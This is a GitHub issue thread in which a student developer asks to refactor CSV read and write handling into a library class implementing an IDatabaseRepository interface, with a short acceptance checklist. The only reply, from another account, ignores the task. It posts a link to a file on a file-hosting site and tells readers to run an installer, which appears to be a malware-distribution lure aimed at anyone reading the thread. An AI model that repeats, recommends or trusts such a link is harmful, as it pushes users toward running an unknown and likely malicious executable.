### ISSUE TITLE
As a developer i want to refactor CSV handling to implement the IDatabaseRepository Interface

### ISSUE THREAD

**Issue by RasmusLarsen02** [ITU-BDSA2024-GROUP10/Chirp#9]
In order to decouple database management away from main process

## Acceptance Criteria 
- [ ] Program can read from CSV file 
- [ ] Program can write to CSV file 
- [ ] Implementation exists only in the library project

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
